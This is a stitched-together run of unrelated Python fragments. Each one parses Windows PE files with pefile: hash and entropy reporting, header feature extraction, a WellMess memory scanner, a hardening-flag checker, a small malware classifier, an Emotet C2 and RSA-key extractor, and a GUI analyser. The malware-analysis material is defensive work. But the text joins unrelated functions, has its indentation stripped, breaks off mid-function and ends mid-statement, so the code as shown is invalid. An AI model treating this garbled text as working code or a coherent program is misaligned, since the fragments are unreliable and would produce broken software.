def SingleFileInfo(filename, data, signatures, options):
pe = pefile.PE(data=data)
raw = pe.write()
print("PE check for '%s':" % filename)
print('Entropy: %f (Min=0.0, Max=8.0)' % pe.sections[0].entropy_H(raw))
print('MD5 hash: %s' % hashlib.md5(raw).hexdigest())
print('SHA-1 hash: %s' % hashlib.sha1(raw).hexdigest())
print('SHA-256 hash: %s' % hashlib.sha256(raw).hexdigest())
print('SHA-512 hash: %s' % hashlib.sha512(raw).hexdigest())
for section in pe.sections:
print('%s entropy: %f (Min=0.0, Max=8.0)' %
(SectionNameToString(section.Name), section.get_entropy()))
print('Dump Info:')
print(ProcessDumpInfo(pe))
print('Signature:')
try:
Signature(pe)
except Exception as e:
print(' Error occured: %s' % e)
print('')
print('PEiD:')
if type(signatures) == str:
print(signatures)
else:
print(signatures.match(pe, ep_only=True))
print('Entry point:')
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_ava = ep + pe.OPTIONAL_HEADER.ImageBase
print('ep: 0x%08x' % ep)
print('ep address: 0x%08x' % ep_ava)
for section in pe.sections:
if section.VirtualAddress <= ep and section.VirtualAddress + section.SizeOfRawData >= ep:
print('Section: %s' % SectionNameToString(section.Name))
print('ep offset: 0x%08x' %
(section.PointerToRawData + ep - section.VirtualAddress))
print('')
print('TLS Callbacks:')
try:
TLSCallbacks(pe)
except Exception as e:
print(' Error occured: %s' % e)
print('')
print('Overlay:')
overlayOffset = Fixed_get_overlay_data_start_offset(pe)
if overlayOffset == None:
print(' No overlay')
else:
print(' Start offset: 0x%08x' % overlayOffset)
overlaySize = len(raw[overlayOffset:])
print(' Size: 0x%08x %s %.2f%%' %
(overlaySize, NumberOfBytesHumanRepresentation(overlaySize),
float(overlaySize) / float(len(raw)) * 100.0))
print(' MD5: %s' %
hashlib.md5(raw[overlayOffset:]).hexdigest())
print(' SHA-256: %s' %
hashlib.sha256(raw[overlayOffset:]).hexdigest())
print(' MAGIC: %s' % GenerateMAGIC(raw[overlayOffset:][:4]))
print(' PE file without overlay:')
print(' MD5: %s' %
hashlib.md5(raw[:overlayOffset]).hexdigest())
print(' SHA-256: %s' %
hashlib.sha256(raw[:overlayOffset]).hexdigest())
if options.yara != None:
print('')
print('YARA:')
if not 'yara' in sys.modules:
print('Error: option yara requires the YARA Python module.')
return
rules, rulesVerbose = YARACompile(options.yara)
if options.verbose:
print(rulesVerbose)
for result in rules.match(data=str(raw)):
print(' Rule: %s' % result.rule)
if options.yarastrings:
for stringdata in result.strings:
print(' %06x %s:' % (stringdata[0], stringdata[1]))
print(' %s' % binascii.hexlify(C2BIP3(stringdata[2])))
print(' %s' % repr(stringdata[2]))
# coding: utf-8
# In[110]:
import pefile
from collections import OrderedDict
path = 'C:/Users/momo/Desktop/benign/0cd2d23daea0baff1d553982269460d09864a3eb68c9e93339a11978a877498f'
pe = pefile.PE(path)
list_of_dict = []
attr_dict = OrderedDict()
# In[125]:
def DOS_HEADER():
global attr_dict
attr_dict["e_magic"] = pe.DOS_HEADER.e_magic
attr_dict["e_cblp"] = pe.DOS_HEADER.e_cblp
attr_dict["e_cp"] = pe.DOS_HEADER.e_cp
attr_dict["e_crlc"] = pe.DOS_HEADER.e_crlc
attr_dict["e_cparhdr"] = pe.DOS_HEADER.e_cparhdr
attr_dict["e_minialloc"] = pe.DOS_HEADER.e_minalloc
attr_dict["e_maxalloc"] = pe.DOS_HEADER.e_maxalloc
attr_dict["e_ss"] = pe.DOS_HEADER.e_ss
attr_dict["e_sp"] = pe.DOS_HEADER.e_sp
attr_dict["e_csum"] = pe.DOS_HEADER.e_csum
attr_dict["e_ip"] = pe.DOS_HEADER.e_ip
attr_dict["e_cs"] = pe.DOS_HEADER.e_cs
attr_dict["e_lfarlc"] = pe.DOS_HEADER.e_lfarlc
def calculate(self):
if not has_yara:
debug.error("Yara must be installed for this plugin")
addr_space = utils.load_as(self._config)
os, memory_model = self.is_valid_profile(addr_space.profile)
if not os:
debug.error("This command does not support the selected profile.")
rules = yara.compile(sources=wellmess_sig)
for task in self.filter_tasks(tasks.pslist(addr_space)):
scanner = malfind.VadYaraScanner(task=task, rules=rules)
for hit, address in scanner.scan():
vad_base_addr, end = self.get_vad_base(task, address)
proc_addr_space = task.get_process_address_space()
data = proc_addr_space.zread(vad_base_addr, end - vad_base_addr)
pe = pefile.PE(data=data)
config_data = []
configs = []
for pattern in CONFIG_PATTERNS:
mc = list(re.finditer(pattern, data))
if mc:
for m in mc:
hit_adderss = m.span()
config_rva = unpack("=I", m.groups()[1])[0]
if pe.FILE_HEADER.Machine == 0x14C: # for 32bit
config_offset = config_rva - pe.NT_HEADERS.OPTIONAL_HEADER.ImageBase
#config_offset = pe.get_physical_by_rva(config_rva - pe.NT_HEADERS.OPTIONAL_HEADER.ImageBase) + 0x1000
else: # for 64bit
config_offset = config_rva + hit_adderss[0] + 26
configs.append(data[config_offset:config_offset + ord(m.groups()[0])])
for pattern in CONFIG_PATTERNS_DOTNET:
mc = re.search(pattern, data)
if mc:
offset = mc.end()
for i in range(6):
strings = []
string_len = ord(data[offset])
if ord(data[offset]) == 0x80 or ord(data[offset]) == 0x83:
string_len = ord(data[offset + 1]) + ((ord(data[offset]) - 0x80) * 256)
offset += 1
offset += 1
for i in range(string_len):
if data[offset + i] != "\x00":
strings.append(data[offset + i])
if string_len != 1:
configs.append("".join(strings))
offset = offset + string_len
config_data.append(self.parse_config(configs))
yield task, vad_base_addr, end, hit, memory_model, config_data
break
def execute(self):
self.tstart = int(time.time())
app.logger.debug(self.tmessage + "EXECUTE")
pe = pefile.PE(self.fpath)
self.compile_timestamp = datetime.date.fromtimestamp(
pe.FILE_HEADER.TimeDateStamp)
self.import_hash = pe.get_imphash()
self.metadata_extracted.append((
SampleMetadataType.PE_import_hash,
self.import_hash))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_magic,
pe.DOS_HEADER.e_magic))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_cblp,
pe.DOS_HEADER.e_cblp))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_cp,
pe.DOS_HEADER.e_cp))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_crlc,
pe.DOS_HEADER.e_crlc))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_cparhdr,
pe.DOS_HEADER.e_cparhdr))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_minalloc,
pe.DOS_HEADER.e_minalloc))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_maxalloc,
pe.DOS_HEADER.e_maxalloc))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_ss,
pe.DOS_HEADER.e_ss))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_sp,
pe.DOS_HEADER.e_sp))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_csum,
pe.DOS_HEADER.e_csum))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_ip,
pe.DOS_HEADER.e_ip))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_cs,
pe.DOS_HEADER.e_cs))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_lfarlc,
pe.DOS_HEADER.e_lfarlc))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_ovno,
pe.DOS_HEADER.e_ovno))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_res,
pe.DOS_HEADER.e_res))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_oemid,
pe.DOS_HEADER.e_oemid))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_oeminfo,
pe.DOS_HEADER.e_oeminfo))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_res2,
pe.DOS_HEADER.e_res2))
self.metadata_extracted.append((
SampleMetadataType.PE_DOS_HEADER_e_lfanew,
pe.DOS_HEADER.e_lfanew))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_Machine,
pe.FILE_HEADER.Machine))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_NumberOfSections,
pe.FILE_HEADER.NumberOfSections))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_TimeDateStamp,
pe.FILE_HEADER.TimeDateStamp))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_PointerToSymbolTable,
pe.FILE_HEADER.PointerToSymbolTable))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_NumberOfSymbols,
pe.FILE_HEADER.NumberOfSymbols))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_SizeOfOptionalHeader,
pe.FILE_HEADER.SizeOfOptionalHeader))
self.metadata_extracted.append((
SampleMetadataType.PE_FILE_HEADER_Characteristics,
pe.FILE_HEADER.Characteristics))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_Magic,
pe.OPTIONAL_HEADER.Magic))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MajorLinkerVersion,
pe.OPTIONAL_HEADER.MajorLinkerVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MinorLinkerVersion,
pe.OPTIONAL_HEADER.MinorLinkerVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfCode,
pe.OPTIONAL_HEADER.SizeOfCode))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfInitializedData,
pe.OPTIONAL_HEADER.SizeOfInitializedData))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfUninitializedData,
pe.OPTIONAL_HEADER.SizeOfUninitializedData))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_AddressOfEntryPoint,
pe.OPTIONAL_HEADER.AddressOfEntryPoint))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_BaseOfCode,
pe.OPTIONAL_HEADER.BaseOfCode))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_ImageBase,
pe.OPTIONAL_HEADER.ImageBase))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SectionAlignment,
pe.OPTIONAL_HEADER.SectionAlignment))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_FileAlignment,
pe.OPTIONAL_HEADER.FileAlignment))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MajorOperatingSystemVersion,
pe.OPTIONAL_HEADER.MajorOperatingSystemVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MinorOperatingSystemVersion,
pe.OPTIONAL_HEADER.MinorOperatingSystemVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MajorImageVersion,
pe.OPTIONAL_HEADER.MajorImageVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MinorImageVersion,
pe.OPTIONAL_HEADER.MinorImageVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MajorSubsystemVersion,
pe.OPTIONAL_HEADER.MajorSubsystemVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_MinorSubsystemVersion,
pe.OPTIONAL_HEADER.MinorSubsystemVersion))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_Reserved1,
pe.OPTIONAL_HEADER.Reserved1))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfImage,
pe.OPTIONAL_HEADER.SizeOfImage))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfHeaders,
pe.OPTIONAL_HEADER.SizeOfHeaders))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_CheckSum,
pe.OPTIONAL_HEADER.CheckSum))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_Subsystem,
pe.OPTIONAL_HEADER.Subsystem))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_DllCharacteristics,
pe.OPTIONAL_HEADER.DllCharacteristics))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfStackReserve,
pe.OPTIONAL_HEADER.SizeOfStackReserve))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfStackCommit,
pe.OPTIONAL_HEADER.SizeOfStackCommit))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfHeapReserve,
pe.OPTIONAL_HEADER.SizeOfHeapReserve))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_SizeOfHeapCommit,
pe.OPTIONAL_HEADER.SizeOfHeapCommit))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_LoaderFlags,
pe.OPTIONAL_HEADER.LoaderFlags))
self.metadata_extracted.append((
SampleMetadataType.PE_OPTIONAL_HEADER_NumberOfRvaAndSizes,
pe.OPTIONAL_HEADER.NumberOfRvaAndSizes))
return True
import pefile
#print('Getting version from executable')
WAPTSETUP = 'waptsetup-tis.exe'
pe = pefile.PE(WAPTSETUP)
version = pe.FileInfo[0].StringTable[0].entries['ProductVersion'].strip()
#print('%s version: %s', WAPTSETUP, version)
print version
def __init__(self, file_path):
self.__file_path = file_path
self.__pe = pefile.PE(file_path)
def imphash():
try:
pe = pefile.PE(GetInputFilePath().decode("utf-8"))
except:
pe = pefile.PE(GetInputFilePath())
return pe.get_imphash()
def main(options, args):
directory = args[0]
pe_total = 0
pe_passed = 0
failures = []
for file in os.listdir(directory):
path = os.path.abspath(os.path.join(directory, file))
if not IsPEFile(path):
continue
pe = pefile.PE(path, fast_load=True)
pe.parse_data_directories(directories=[
pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG']
])
pe_total = pe_total + 1
success = True
# Check for /DYNAMICBASE.
if pe.OPTIONAL_HEADER.DllCharacteristics & DYNAMICBASE_FLAG:
if options.verbose:
print "Checking %s for /DYNAMICBASE... PASS" % path
else:
success = False
print "Checking %s for /DYNAMICBASE... FAIL" % path
# Check for /NXCOMPAT.
if pe.OPTIONAL_HEADER.DllCharacteristics & NXCOMPAT_FLAG:
if options.verbose:
print "Checking %s for /NXCOMPAT... PASS" % path
else:
success = False
print "Checking %s for /NXCOMPAT... FAIL" % path
# Check for /SAFESEH. Binaries should meet one of the following
# criteria:
# 1) Have no SEH table as indicated by the DLL characteristics
# 2) Have a LOAD_CONFIG section containing a valid SEH table
# 3) Be a 64-bit binary, in which case /SAFESEH isn't required
#
# Refer to the following MSDN article for more information:
# http://msdn.microsoft.com/en-us/library/9a89h429.aspx
if (pe.OPTIONAL_HEADER.DllCharacteristics & NO_SEH_FLAG or
(hasattr(pe, "DIRECTORY_ENTRY_LOAD_CONFIG")
and pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.SEHandlerCount > 0
and pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.SEHandlerTable != 0)
or pe.FILE_HEADER.Machine == MACHINE_TYPE_AMD64):
if options.verbose:
print "Checking %s for /SAFESEH... PASS" % path
else:
success = False
print "Checking %s for /SAFESEH... FAIL" % path
# ASLR is weakened on Windows 64-bit when the ImageBase is below 4GB
# (because the loader will never be rebase the image above 4GB).
if pe.FILE_HEADER.Machine == MACHINE_TYPE_AMD64:
if pe.OPTIONAL_HEADER.ImageBase <= 0xFFFFFFFF:
print("Checking %s ImageBase (0x%X < 4GB)... FAIL" %
(path, pe.OPTIONAL_HEADER.ImageBase))
success = False
elif options.verbose:
print("Checking %s ImageBase (0x%X > 4GB)... PASS" %
(path, pe.OPTIONAL_HEADER.ImageBase))
# Update tally.
if success:
pe_passed = pe_passed + 1
else:
failures.append(path)
print "Result: %d files found, %d files passed" % (pe_total, pe_passed)
if options.json:
with open(options.json, 'w') as f:
json.dump(failures, f)
if pe_passed != pe_total:
sys.exit(1)
def __check_valid_pe_file(file_path):
try:
pe = pefile.PE(file_path, fast_load=True)
return pe.is_exe()
except Exception:
return False
def getTimeDateStamp(filename):
pe = pefile.PE(filename)
print("TimeDateStamp: " + hex(pe.FILE_HEADER.TimeDateStamp))
def predict(self):
try:
pe=pefile.PE(self.test_file_path)
feat=[]
for i in range(0,21):
val=getattr(pe.OPTIONAL_HEADER,self.feature_names[self.select_feat_index[i]])
feat.append(val)
#print(feat)
feat_vec=numpy.zeros([1,21])
feat_vec[0,:]=feat
#print(feat_vec)
mi=numpy.array([ 1.00000000e+00, 1.28000000e+02, 1.28000000e+02,
1.00000000e+00, 0.00000000e+00, 0.00000000e+00,
1.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 2.67000000e+02, 0.00000000e+00,
0.00000000e+00, 5.12000000e+02, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 4.09600000e+03, 0.00000000e+00])
ma=numpy.array([ 1.60000000e+01, 4.09600000e+03, 8.19200000e+03,
1.00000000e+01, 6.44245094e+09, 1.00000000e+01,
1.87000000e+02, 3.49050499e+09, 1.01846528e+08,
4.19444628e+09, 5.23000000e+02, 5.04960000e+04,
2.51658240e+08, 2.74944000e+05, 2.22126592e+08,
2.56000000e+02, 6.90000000e+01, 1.00253696e+08,
2.13150000e+04, 3.35544320e+07, 1.39459700e+06])
for i in range(0,21):
if(mi[i]==ma[i]):
feat_vec[0,i]=0.0
else:
feat_vec[0,i]=(feat_vec[0,i]-mi[i])/(ma[i]-mi[i])
#min_max_scaler = preprocessing.MinMaxScaler()
#feat_vec[:,0:21]=min_max_scaler.fit_transform(feat_vec[:,0:21])
#print(feat_vec)
#final_feat_virus=numpy.genfromtxt('FINAL_DATASET_FEATURE.csv', delimiter=',')
means=numpy.array([ 8.36163582e-02, 1.47967945e-01, 5.26860862e-01,
4.50009540e-01, 1.60621025e-01, 4.97357375e-01,
4.66421700e-02, 4.19539575e-03, 4.25460790e-03,
6.18079023e-03, 2.35260446e-01, 5.58766459e-01,
6.59444218e-03, 2.64416390e-03, 2.87599082e-03,
3.23061260e-03, 6.29153082e-02, 3.67476138e-04,
9.08667623e-04, 3.19912127e-02, 2.28881862e-04])
for i in range(0,21):
feat_vec[0,i]=feat_vec[0,i] > means[i]
#rint(feat_vec)
predict_model = theano.function(
inputs=[self.dbn.x],
outputs=self.classifier.y_pred
)
self.predicted_value = predict_model(feat_vec)
if(self.predicted_value==1):
print("virus")
else:
print("normal")
except:
print("Not")
def run(self):
filebuf = self.file_object.file_data
pe = pefile.PE(data=filebuf, fast_load=False)
image_base = pe.OPTIONAL_HEADER.ImageBase
c2found = False
c2list = yara_scan(filebuf, "$c2list")
if c2list:
ips_offset = int(c2list["$c2list"])
ip = struct.unpack("I", filebuf[ips_offset : ips_offset + 4])[0]
while ip:
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("h", filebuf[ips_offset + 4 : ips_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
ips_offset += 8
ip = struct.unpack("I", filebuf[ips_offset : ips_offset + 4])[0]
else:
refc2list = yara_scan(filebuf, "$snippet3")
if refc2list:
c2list_va_offset = int(refc2list["$snippet3"])
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + 2 : c2list_va_offset + 6])[0]
if c2_list_va - image_base > 0x20000:
c2_list_va = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
pass
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
return
if ip == 0:
return
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
return
c2_list_offset += 8
else:
refc2list = yara_scan(filebuf, "$snippet4")
if refc2list:
c2list_va_offset = int(refc2list["$snippet4"])
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + 8 : c2list_va_offset + 12])[0]
if c2_list_va - image_base > 0x20000:
c2_list_rva = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
pass
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
return
if ip == 0:
return
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
return
c2_list_offset += 8
else:
snippet = "$snippet5"
delta = 5
refc2list = yara_scan(filebuf, snippet)
if not refc2list:
snippet = "$snippet8"
refc2list = yara_scan(filebuf, snippet)
if not refc2list:
snippet = "$snippet9"
delta = 9
refc2list = yara_scan(filebuf, snippet)
if refc2list:
c2list_va_offset = int(refc2list[snippet])
tb = struct.unpack("b", filebuf[c2list_va_offset+5:c2list_va_offset+6])[0]
if tb == 0x48:
delta += 1
if not refc2list:
snippet = "$snippetB"
delta = 9
refc2list = yara_scan(filebuf, snippet)
if refc2list:
c2list_va_offset = int(refc2list[snippet])
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + delta : c2list_va_offset + delta + 4])[0]
if c2_list_va - image_base > 0x20000:
c2_list_rva = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
return
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
break
if ip == 0:
break
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
break
c2_list_offset += 8
else:
refc2list = yara_scan(filebuf, "$snippet6")
if refc2list:
c2list_va_offset = int(refc2list["$snippet6"])
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + 15 : c2list_va_offset + 19])[0]
if c2_list_va - image_base > 0x20000:
c2_list_rva = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
pass
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
break
if ip == 0:
break
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
break
c2_list_offset += 8
else:
refc2list = yara_scan(filebuf, "$snippet7")
if refc2list:
c2list_va_offset = int(refc2list["$snippet7"])
delta = 26
hb = struct.unpack("b", filebuf[c2list_va_offset + 29 : c2list_va_offset + 30])[0]
if hb:
delta += 1
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + delta : c2list_va_offset + delta + 4])[0]
if c2_list_va - image_base > 0x20000:
c2_list_rva = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
pass
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
break
if ip == 0:
break
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
break
c2_list_offset += 8
else:
refc2list = yara_scan(filebuf, "$snippetA")
if refc2list:
c2list_va_offset = int(refc2list["$snippetA"])
c2_list_va = struct.unpack("I", filebuf[c2list_va_offset + 24 : c2list_va_offset + 28])[0]
if c2_list_va - image_base > 0x20000:
c2_list_rva = c2_list_va & 0xFFFF
else:
c2_list_rva = c2_list_va - image_base
try:
c2_list_offset = pe.get_offset_from_rva(c2_list_rva)
except pefile.PEFormatError as err:
pass
while 1:
try:
ip = struct.unpack("<I", filebuf[c2_list_offset : c2_list_offset + 4])[0]
except:
return
if ip == 0:
return
c2_address = socket.inet_ntoa(struct.pack("!L", ip))
port = str(struct.unpack("H", filebuf[c2_list_offset + 4 : c2_list_offset + 6])[0])
if c2_address and port:
self.reporter.add_metadata("address", c2_address + ":" + port)
c2found = True
else:
return
c2_list_offset += 8
if not c2found:
return
pem_key = extract_emotet_rsakey(pe)
if pem_key:
self.reporter.add_metadata("other", {"RSA public key": pem_key.exportKey().decode('utf8')})
else:
ref_rsa = yara_scan(filebuf, "$ref_rsa")
if ref_rsa:
ref_rsa_offset = int(ref_rsa["$ref_rsa"])
ref_rsa_va = 0
zb = struct.unpack("b", filebuf[ref_rsa_offset + 31 : ref_rsa_offset + 32])[0]
if not zb:
ref_rsa_va = struct.unpack("I", filebuf[ref_rsa_offset + 28 : ref_rsa_offset + 32])[0]
else:
zb = struct.unpack("b", filebuf[ref_rsa_offset + 29 : ref_rsa_offset + 30])[0]
if not zb:
ref_rsa_va = struct.unpack("I", filebuf[ref_rsa_offset + 26 : ref_rsa_offset + 30])[0]
else:
zb = struct.unpack("b", filebuf[ref_rsa_offset + 28 : ref_rsa_offset + 29])[0]
if not zb:
ref_rsa_va = struct.unpack("I", filebuf[ref_rsa_offset + 25 : ref_rsa_offset + 29])[0]
else:
zb = struct.unpack("b", filebuf[ref_rsa_offset + 38 : ref_rsa_offset + 39])[0]
if not zb:
ref_rsa_va = struct.unpack("I", filebuf[ref_rsa_offset + 35 : ref_rsa_offset + 39])[0]
if not ref_rsa_va:
return
ref_rsa_rva = ref_rsa_va - image_base
try:
ref_rsa_offset = pe.get_offset_from_rva(ref_rsa_rva)
except:
return
key = struct.unpack("<I", filebuf[ref_rsa_offset : ref_rsa_offset + 4])[0]
xorsize = key ^ struct.unpack("<I", filebuf[ref_rsa_offset + 4 : ref_rsa_offset + 8])[0]
rsa_key = xor_data(filebuf[ref_rsa_offset + 8 : ref_rsa_offset + 8 + xorsize], struct.pack("<I", key))
seq = asn1.DerSequence()
seq.decode(rsa_key)
self.reporter.add_metadata("other", {"RSA public key": RSA.construct((seq[0], seq[1])).exportKey()})
def analyse(self):
global source, len_all_sections
len_all_sections = 0
pe = pefile.PE(str(source))
# Valeur EntryPoint ( Hexa )
self.e_entrypoint.config(state='normal')
self.e_entrypoint.delete(0, 'end')
self.e_entrypoint.insert(0,
hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
self.e_entrypoint.config(state='disabled')
# Valeur ImageBase ( Hexa )
self.e_imagebase.config(state='normal')
self.e_imagebase.delete(0, 'end')
self.e_imagebase.insert(0, hex(pe.OPTIONAL_HEADER.ImageBase))
self.e_imagebase.config(state='disabled')
# Nombre de Sections
self.e_nb_sections.config(state='normal')
self.e_nb_sections.delete(0, 'end')
self.e_nb_sections.insert(0,
"{}".format(pe.FILE_HEADER.NumberOfSections))
self.e_nb_sections.config(state='disabled')
# Packer
signatures = peutils.SignatureDatabase('Data/userdb.txt')
matches = signatures.match(pe, ep_only=True)
if matches == None:
self.e_packer.config(state='normal')
self.e_packer.delete(0, 'end')
self.e_packer.insert(10, " [-] Packer not found")
self.e_packer.config(state='disabled')
else:
self.e_packer.config(state='normal')
self.e_packer.delete(0, 'end')
self.e_packer.insert(0, "[*] Packer found ")
self.e_packer.config(state='disabled')
# Len All Sections ( Hexa )
for sec in pe.sections:
len_all_sections += sec.SizeOfRawData
self.e_section_info.config(state='normal')
self.e_section_info.delete(0, 'end')
self.e_section_info.insert(0, hex(len_all_sections))
self.e_section_info.config(state='disabled')
# Sections Description
self.bt_watch_sections.config(state='normal')
self.txt_sections.config(state='normal')
self.txt_sections.delete(0.0, 'end')
for sec in pe.sections:
sec.Name = str(sec.Name)
sec.Name = sec.Name.replace("b'", "")
sec.Name = sec.Name.replace("\\x00\\x00\\x00'", "")
if sec.Name == ".reloc\\x00\\x00'":
sec.Name = sec.Name.replace("\\x00\\x00'", "")
sec.Name = sec.Name.replace("\\x00", "")
self.txt_sections.insert(
'end',
"{} at {} Size of raw_data (in {} section) : {}\n\n".format(
str(sec.Name), hex(sec.VirtualAddress), str(sec.Name),
hex(sec.SizeOfRawData)))
self.txt_sections.config(state='disabled')
# Imports Description and Number
self.bt_watch_imports.config(state='normal')
compteur = 0
self.txt_imports.config(state='normal')
self.txt_imports.delete(0.0, 'end')
for entry in pe.DIRECTORY_ENTRY_IMPORT:
compteur += 1
self.txt_imports.insert('end',
"{}\n".format(entry.dll.decode('utf-8')))
for imp in entry.imports:
self.txt_imports.insert('end', ('\t{} \t{}\n'.format(
hex(imp.address), imp.name.decode('utf-8'))))
self.txt_imports.insert('end', '\n')
self.txt_imports.config(state='disabled')
self.e_imports_info.config(state='normal')
self.e_imports_info.delete(0, 'end')
self.e_imports_info.insert(0, str(compteur))
self.e_imports_info.config(state='disabled')
# Image Dos Header Description and Number
self.bt_watch_img_dos_header.config(state='normal')
p = 0
compteur = 0
self.txt_img_dos_header.config(state='normal')
self.txt_img_dos_header.delete(0.0, 'end')
for field in pe.DOS_HEADER.dump():
compteur += 1
if p == 0:
